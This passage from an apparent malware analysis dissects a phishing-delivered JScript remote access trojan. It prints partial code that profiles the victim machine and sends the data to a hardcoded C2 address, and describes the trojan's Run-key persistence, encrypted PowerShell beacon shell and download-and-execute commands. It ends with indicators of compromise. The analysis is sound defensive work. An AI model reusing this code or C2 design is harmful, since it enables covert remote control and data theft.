f3.GetCurrentScriptFile = function () { /* omitted */ };
f3.GetEnviromentVariable = function (p15) { /* omitted */ };
f3.GetScriptHostFile = function () { /* omitted */ };
f3.OpenFile = function (p16) {
if (f3.application == null) {
f3.application = f3.CreateObject("Shell.Application");
}
f3.application.ShellExecute(p16.GetAbsolutePath(), "", "", "open", 1);
};
f3.QueryWMIService = function (p17, p18) {
if (f3.wmiObject == null) {
f3.wmiObject = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
}
for (var v20 = f3.wmiObject.ExecQuery("SELECT " + p18 + " FROM " + p17), vArray = Array(v20.Count), v21 = 0; v21 < v20.Count; v21++) {
vArray[v21] = v20.ItemIndex(v21)[p18];
}
v20 = null;
return vArray;
};
f3.Run = function (p19, p20, p21) { /* omitted */ };
f3.RunScript = function (p22) {
/* omitted */
var v28 = f3.Exec(v25);
f3.Sleep(400);
return v28.Status <= v.Finished;
};
f3.Sleep = function (p23) { /* omitted */ };
f3.Object = f3.CreateObject("Wscript.Shell");
f3.wscriptShell = WSH;
return f3;
}();
var vVF3 = vF3;
File System
The vF5 class implements abstractions for file system operations.
The path separator is set to the Windows path separator. The constructor
combines a parent path, which defaults to the current working directory,
and an optional child path and normalises the combined path.
GetFileSystemObjectlazy-loads an instance of theScripting.FileSystemObjectCOM object.Copycopies a file or folder from one path to another.CopyTocopies the current file or folder to the target path.CreateParentPathcreates the parent folder of the current path if necessary.CreateTemporaryFilecreates a file with a pseudorandom name in the%TMP%folder.Deletedeletes the current path, forcing folder deletion if the parameter istrue.Existschecks whether the current path exists.EqualTochecks whether the current path is equal to another, ignoring case.GetAbsolutePathresolves the absolute path of the current file or folder.GetExtensionreturns the extension of the current path, if any.GetNamereturns the file (or folder) name of the current path.GetParentreturns the parent folder path as a string.GetParentFilereturns the parent folder path as an object.GetPathreturns the current path as a string.GetSizereturns the size in bytes of the current file or folder.MakeDirectries[sic] recursively creates the folder if it doesn’t exist.
var vF5 = function () {
function f5(p42, p43) { /* omitted */ }
f5.GetFileSystemObject = function () {
if (f5.fso == null) {
f5.fso = vVF3.CreateObject("Scripting.FileSystemObject");
}
return f5.fso;
};
f5.Copy = function (p44, p45, p46 = true) { /* omitted */;
f5.prototype.CopyTo = function (p47, p48 = true) { /* omitted */ };
f5.prototype.CreateParentPath = function () { /* omitted */ };
f5.CreateTemporaryFile = function (p49) { /* omitted */ };
f5.prototype.Delete = function (p50 = false) { /* omitted */ };
f5.prototype.Exists = function () { /* omitted */ };
f5.prototype.EqualTo = function (p51) { /* omitted */ };
f5.prototype.GetAbsolutePath = function () { /* omitted */ };
f5.prototype.GetExtension = function () { /* omitted */ };
f5.prototype.GetName = function () { /* omitted */ };
f5.prototype.GetParent = function () { /* omitted */ };
f5.prototype.GetParentFile = function () { /* omitted */ };
f5.prototype.GetPath = function () { /* omitted */ };
f5.prototype.GetSize = function () { /* omitted */ };
f5.prototype.MakeDirectries = function () { /* omitted */ };
f5.separator = "\\";
return f5;
}();
Core Utilities
The vF4 class provides various utilities for encoding, WMI queries, and PowerShell commands.
-
GetProcessListretrieve a list of unique process names through WMI. -
GetComputerInforetrieves computer information through the environment and WMI:- User domain
- Username
- System serial number
- OS caption
p24istrue, it also retrieve the following extra information:- Total memory
- Computer model
- CPU name
- GPU name
- OS architecture
-
DownloadFiledownloads a file from a URL to a local path using PowerShell. -
RunPowershellexecutes a PowerShell command after encoding it to base64. -
GetRandonNumber[sic] generates a random number, optionally between two values. -
GetRandomStringgenerates a random alphanumeric string of the specified length. -
HexToAsciiconverts a hexadecimal string to its ASCII representation. -
AsciiToHexconverts an ASCII string to its hexadecimal representation. -
BytesToHexconverts a byte array to a hexadecimal string. -
HexToBytesconverts a hexadecimal string to a byte array. -
StringToUTF16Bytesconverts a string to a UTF-16 byte array, handling escape sequences. -
BytesToBase64encodes a byte array into a base64 string. -
SerializeFormconverts an object to a URL-encoded query string. -
XorEncryptDecryptperforms XOR encryption/decryption between a string and a byte array.
var vF4 = function () {
function f4() {}
f4.GetProcessList = function () {
for (var v29 = vVF3.QueryWMIService("Win32_Process", "Name"), v30 = [], v31 = 0; v31 < v29.length; v31++) {
var v32 = true;
var v33 = v29[v31];
if (!String.IsNullOrWhiteSpace(v33)) {
for (var v34 = 0; v34 < v30.length; v34++) {
if (v33 === v30[v34]) {
v32 = false;
break;
}
}
if (v32) {
v30.push(v33);
}
}
}
return v30;
};
f4.GetComputerInfo = function (p24 = false) {
var v35 = [];
v35.push(vVF3.GetEnviromentVariable("USERDOMAIN"), vVF3.GetEnviromentVariable("USERNAME"), vVF3.QueryWMIService("Win32_SystemEnclosure", "SerialNumber")[0], vVF3.QueryWMIService("Win32_OperatingSystem", "Caption")[0].replace("Microsoft ", ""));
if (p24) {
v35.push(vVF3.QueryWMIService("Win32_ComputerSystem", "TotalPhysicalMemory")[0], vVF3.QueryWMIService("Win32_ComputerSystem", "Model")[0], vVF3.QueryWMIService("Win32_Processor", "Name")[0], vVF3.QueryWMIService("Win32_VideoController", "Name")[0], vVF3.QueryWMIService("Win32_OperatingSystem", "OSArchitecture")[0]);
}
return v35;
};
f4.DownloadFile = function (p25, p26) { /* omitted */ };
f4.RunPowerShell = function (p27, p28 = true) { /* omitted */ };
f4.GetRandonNumber = function (p29, p30) { /* omitted */ };
f4.GetRandomString = function (p31) { /* omitted */ };
f4.HexToAscii = function (p32) { /* omitted */ };
f4.AsciiToHex = function (p33) { /* omitted */ };
f4.BytesToHex = function (p34) { /* omitted */ };
f4.HexToBytes = function (p35) { /* omitted */ };
f4.StringToUTF16Bytes = function (p36, p37 = true) { /* omitted */ };
f4.BytesToBase64 = function (p38) { /* omitted */ };
f4.SerializeForm = function (p39) { /* omitted */ };
f4.XorEncryptDecrypt = function (p40, p41) { /* omitted */ };
f4.BASE64_CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
return f4;
}();
Execution Engine
Anti-analysis Logic
The vF9 class is a classic anti-sandbox evasion component. It performs
junk operations with repeated calculations and delays during startup to
slow down or confuse automated analysis tools, then cleans up after itself.
var vF9 = function () {
function f10() { /* omitted */ }
f10.prototype.Open = function (p75) { /* omitted */ };
f10.prototype.Close = function () { /* omitted */ };
f10.prototype.Dispose = function () { /* omitted */ };
return f10;
}();
Fake Multi-threading
The vF10 class provides a fake thread wrapper. It mimics
multi-threading behaviour by wrapping a target object and running its
main logic synchronously while tracking a simple thread state and ID.
var vF10 = function () {
function f12(p79) { /* omitted */ }
f12.nextThreadID = function () { /* omitted */ };
f12.prototype.Run = function () { /* omitted */ };
f12.prototype.Start = function () { /* omitted */ };
f12.prototype.IsAlive = function () { /* omitted */ };
f12.prototype.GetId = function () { /* omitted */ };
f12.threadSeqNumber = 0;
return f12;
}();
Command Handling
The vF7 class is responsible for handling commands received from the C2 server.
The Handle function reads the X-A response header and dispatches to the appropriate handler.
| Value | Action |
|---|---|
| -7 | Update client |
| -6 | Uninstall client |
| -5 | Close client |
| -4 | Restart client |
| -3 | Disconnect |
| -2 | Reconnect |
| -1 | Sleep |
| 0 | Wake |
| 1 | Download & execute file |
| 2 | Start beacon shell |
| 3 | Run PowerShell command |
| 4 | Send system properties |
All payloads executed in PowerShell are encrypted using AES-CBC with a 32 byte key that is
sent by the server, often alongside a token which is passed to the respective parameter of
the command, and a hardcoded IV 76E6F6C63756479726E6565647879637 which is reversed.
ExecuteShelllaunches an encrypted HTTP beacon shell in PowerShell. It continuously polls the C2 server using thetwparameter (GetShell) with a server-sent 12 byte token, decrypts received commands, executes them, and sends the results back through the headerstwfor the encrypted output andxfor the status. It stops when multiple consecutive attempts fail or the server returns status 404.ExecuteFiledownloads an encrypted payload from the C2 server using theexparameter (GetFile) with a server-sent 12 byte token, decrypts it, writes it to a temporary path, and executes it.LoadProcessretrieves an encrypted PowerShell payload from the C2 server using thesbparameter (GetLoader) with a server-sent 12 byte token, and anfpparameter set to “1”. It decrypts the payload and pipes it into a hidden PowerShell process via standard input, bypassing command-line logging.GetPropertiesretrieves detailed computer info and the running processes, serialises the results to JSON and encrypts them with XOR. Then, it sends the encrypted results to the C2 server using thedfparameter (GetProperties) with a randomly generated 8 byte token, abparameter for the computer info, and acparameter for the process list. If the requests was successful, it calls the client object’sTryInstallStartupmethod to achieve persistence.UpdateClientrequests the latest version of the malware from the C2 server using thekpparameter (GetUpdate) with a server-sent 16 byte token, downloads it, and replaces the old script with it.
var vF7 = function () {
function f8() {}
f8.Handle = function (p57, p58) {
switch (p58.getResponseHeader("X-A")) {
/* omitted */
}
};
f8.ExecuteShell = function (p59, p60) { /* omitted */ };
f8.ExecuteFile = function (p61, p62) { /* omitted */ };
f8.LoadProcess = function (p63, p64) { /* omitted */ };
f8.GetProperties = function (p65, p66) { /* omitted */ };
f8.UpdateClient = function (p67, p68) { /* omitted */ };
return f8;
}();
C2 Communication
The vF8 class handles the communication with the C2 server.
Its constructor stores a list of servers and a client instance,
and initialises multiple connection state variables.
Runis the main loop which runs until the connection is closed, callingConnectto connect or reconnect to the server, orPingif already connected.Connectsends a POST request to the server with the parameterahardcoded to the value “iz” and the parameterbcontaining a pipe-separated list of computer info. It sets the session identifier from theX-Sresponse header. It handles the received command if the request was successful, otherwise it rotates the configured C2 server in order to try again.Pingsends a POST request to the server with the parameteriaset to the session identifier in order to determine whether the connection is still active and receive a new command.Disconnectmarks the C2 server as disconnected and rotates to another.AvailableHostfilters the C2 server list excluding disconnected hosts.RotateHostcycles through the C2 server list.Waitsleeps for the specified number of seconds.MakeUrlconstructs a C2 URL with a specific action based on its parameters.Close,Idle,Sleep,Wake, andIncreaseWaitmodify the connection state.
var vF8 = function () {
function f9(p69, p70) { /* omitted */ }
f9.prototype.Run = function () { /* omitted */ };
f9.prototype.Connect = function () {
if (this.REQUEST_DATA == null) {
this.REQUEST_DATA = vF4.SerializeForm({
a: "iz",
b: vF4.GetComputerInfo().join("|")
});
}
try {
var v129 = vVF3.CreateObject("MSXML2.XMLHTTP");
v129.open("POST", this.HOST, false);
v129.SetRequestHeader("content-type", "application/x-www-form-urlencoded");
v129.send(this.REQUEST_DATA);
this.IDENTIFIER = v129.getResponseHeader("X-S") ?? "";
/* omitted */
} catch (ffFffFfFffFFffff) {
/* omitted */
}
};
f9.prototype.Ping = function () {
try {
var v130 = vVF3.CreateObject("MSXML2.XMLHTTP");
v130.open("POST", this.HOST + "?ia=" + this.IDENTIFIER, false);
v130.send();
/* omitted */
} catch (fFFFFFfFffFFffff) {
/* omitted */
}
};
f9.prototype.Close = function () { /* omitted */ };
f9.prototype.Disconnect = function () { /* omitted */ };
f9.prototype.Reconnect = function () { /* omitted */ };
f9.prototype.Idle = function () { /* omitted */ };
f9.prototype.Sleep = function () { /* omitted */ };
f9.prototype.Wake = function () { /* omitted */ };
f9.prototype.AvailableHost = function () { /* omitted */ };
f9.prototype.RotateHost = function () { /* omitted */ };
f9.prototype.IncreaseWait = function () { /* omitted */ };
f9.prototype.Wait = function (p72) { /* omitted */ };
f9.prototype.MakeUrl = function (p73, p74) {
var v134 = "";
v134 += this.HOST;
v134 += "?ia=";
v134 += this.IDENTIFIER;
v134 += "&";
v134 += p74;
return (v134 += "=") + p73;
};
return f9;
}();
Entry Point
The vF11 class is the main entry point of the malware.
Methods:
Mainhandles the CLI arguments of the script.InstantConnect: callsInstantConnectionDelayedConnect: callsDelayedConnectionUpdateClient: sleeps if theIdentifieris specified and callsTryUpdateClient- Otherwise, calls
TryInstallClient
DelayedConnectionperforms the post-execution action and the anti-analysis operations before connecting to the C2 server.InstantConnectionsimply connects to the C2 server.StartConnectionsdefines an array of C2 servers (with only one element in this case), uses thef11class to store their properties, and starts the network loop.GetInstallFilereturns the persistent installation path of the malware. In this case, the path is%APPDATA%\RLnayPzlrL\vTzbMzqSByiilfQejkxuoQiJHAFhjt.js.GetInstallKeyreturns the Run registry key used for persistence. In this case, the key isHKCU\Software\Microsoft\Windows\CurrentVersion\Run\RLnayPzlrL.Restartrelaunches the script withInstantConnect, through the installation path if available, and terminates the current instance.Closeterminates the script.Updaterelaunches the script withUpdateClientand uninstalls the current version.TryInstallStartupwrites a Run registry key for persistence which launches the installed script withInstantConnect.TryInstallClientcopies the current script to the installation path, runs the post-installation action, optionally deletes the original file, and initiates a delayed connection.TryUpdateClientreplaces the installed script with the current one, optionally deletes the original file, and initiates an instant connection.Uninstalldeletes the Run registry key, the installed script, and the current file, and exits.
Functions:
OnExecutionperforms the post-execution action.OnInstallationperforms the post-installation action.TryExecuteShellexecutes a shell command withvVF3.Exec.TryOpenURLopens a URL withvVF3.Run.
Properties:
Installed: Tracks whether the malware has been installed persistently.Identifier: Hardcoded client UUID used during registration.UpdateClient: CLI argument which triggers a self-update.DelayedConnect: CLI argument for connecting with a delay (used post-install).InstantConnect: CLI argument for connecting with no delay.PathName: The persistence base path environment variable.FolderName: The subfolder name created under the base path.FileName: The filename of the installed script.DecryptionKey: Unused.ConnectionMode: Unused.ConnectionDelay: The number of seconds to wait before the first connection attempt.InstallationDelay: The number of seconds to wait before performing the installation.InstallClient: Boolean flag controlling whether to install the client to the persistence path.MeltOriginalFile: Boolean flag controlling whether the original file will be deleted.OnExecutionType: Flag which defines a post-execution action. 1 opens a URL, 2 runs a shell command, any other value does nothing.OnExecutionValue: The value of the post-execution action. In this case, the URL of a blank PDF which is used as a decoy.OnInstallationType: Flag which defines a post-installation action. 1 opens a URL, 2 runs a shell command, any other value does nothing.OnInstallationValue: The value of the post-installation action. Empty in this case.
function f11(p76, p77) {
this.disconnected = false;
this.address = p76;
this.index = p77;
}
var vF11 = function () {
function f13() {}
f13.prototype.Main = function (p80) { /* omitted */ };
f13.prototype.DelayedConnection = function () { /* omitted */ };
f13.prototype.InstantConnection = function () { /* omitted */ };
f13.prototype.StartConnections = function () {
var v137 = ["http://91.92.243.79:4454/gATIjh"].map(function (p81, p82) {
return new f11(p81, p82);
});
new vF10(new vF8(v137, this)).Start();
};
f13.prototype.GetInstallFile = function () { /* omitted */ };
f13.prototype.GetInstallKey = function () {
return vF5.GetFileSystemObject().BuildPath("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", f13.FolderName);
};
f13.prototype.Restart = function () { /* omitted */ };
f13.prototype.Close = function () { /* omitted */ };
f13.prototype.Update = function (p83) { /* omitted */ };
f13.prototype.TryInstallStartup = function () { /* omitted */ };
f13.prototype.TryInstallClient = function () { /* omitted */ };
f13.prototype.TryUpdateClient = function () { /* omitted */ };
f13.prototype.Uninstall = function () { /* omitted */ };
f13.OnExecution = function () { /* omitted */ };
f13.OnInstallation = function () { /* omitted */ };
f13.TryExecuteShell = function (p84) { /* omitted */ };
f13.TryOpenURL = function (p85) { /* omitted */ };
f13.Installed = false;
f13.Identifier = "7dea2ef3-705e-4249-ad9e-00d2c52629d6";
f13.UpdateClient = "--update";
f13.DelayedConnect = "MYEVWDOB";
f13.InstantConnect = "NmuLUxSdK";
f13.PathName = "APPDATA";
f13.FolderName = "RLnayPzlrL";
f13.FileName = "vTzbMzqSByiilfQejkxuoQiJHAFhjt";
f13.DecryptionKey = "";
f13.ConnectionMode = "0";
f13.ConnectionDelay = "0";
f13.InstallationDelay = "0";
f13.InstallClient = "1";
f13.MeltOriginalFile = "0";
f13.OnExecutionType = "1";
f13.OnExecutionValue = "https://mag.wcoomd.org/uploads/2018/05/blank.pdf";
f13.OnInstallationType = "-1";
f13.OnInstallationValue = "";
return f13;
}();
Finally, the script sets up the environment and runs the entry point.
vF2.Initialize();
vF2.Run(new vF11());
Summary
The C2 protocol used in this malware is structured and operates over plain HTTP.
The session begins with a POST request with the parameters a set to “iz” and
b containing the computer info, to which the server responds with an X-S
header containing the assigned session ID. Subsequent keep-alive pings are
POST requests with the ia parameter set to the session ID.
The server issues commands via the X-A header as signed integer codes, with non-positive
values used for client and connection management and positive values used for command execution.
When a command is issued, the response body contains a token (except for GetProperties),
an AES key, and optional trailing data, which the client uses to construct a secondary request
with a specific parameter for each command. All payloads are AES-CBC encrypted with the provided key
and a hardcoded IV. The beacon shell output is also encrypted and passed in the tw request header.
It’s worth noting that the upper camel case names of the identifiers used in this script,
along with the thread abstraction and the Dispose method, are strong indicators that the
malware was ported from C#. Furthermore, the bidirectional numeric enums are a TypeScript trait
which indicates that the malware was ported from C# to TypeScript and then compiled to JavaScript.
Indicators of Compromise
| Type | Value | Links | Comment |
|---|---|---|---|
| dao@ambserbie-alger.com | N/A | Sender address | |
| Domain | ambserbie-alger.com | MXToolBox VirusTotal | Sender domain |
| IP | 85.137.51.11 | AbuseIPDB | Sender IP |
| IP | 91.92.243.79 | AbuseIPDB VirusTotal | C2 IP |
| Hash | 745158871066b7e3aa4ed48234c5f24b | VirusTotal ANY.RUN | GR5000171604.7z |
| Hash | 738f09e31a901c3506f4ae193476ff07 | VirusTotal Hybrid Analysis | GR5000171604.js |
| URL | https://mag.wcoomd.org/uploads/2018/05/blank.pdf | VirusTotal | Decoy |
MITRE ATT&CK® Techniques
| Tactic | Technique |
|---|---|
| Initial Access | T1566.001 - Phishing: Spearphishing Attachment |
| Execution | T1204.002 - User Execution: Malicious File |
| Execution | T1059.007 - Command and Scripting Interpreter: JavaScript |
| Execution | T1059.001 - Command and Scripting Interpreter: PowerShell |
| Persistence | T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
| Defense Evasion | T1027 - Obfuscated Files or Information |
| Defense Evasion | T1070.010 - Indicator Removal: Relocate Malware |
| Discovery | T1082 - System Information Discovery |
| Discovery | T1057 - Process Discovery |
| Command and Control | T1071/001 - Application Layer Protocol: Web Protocols |
| Exfiltration | T1041 - Exfiltration Over C2 Channel |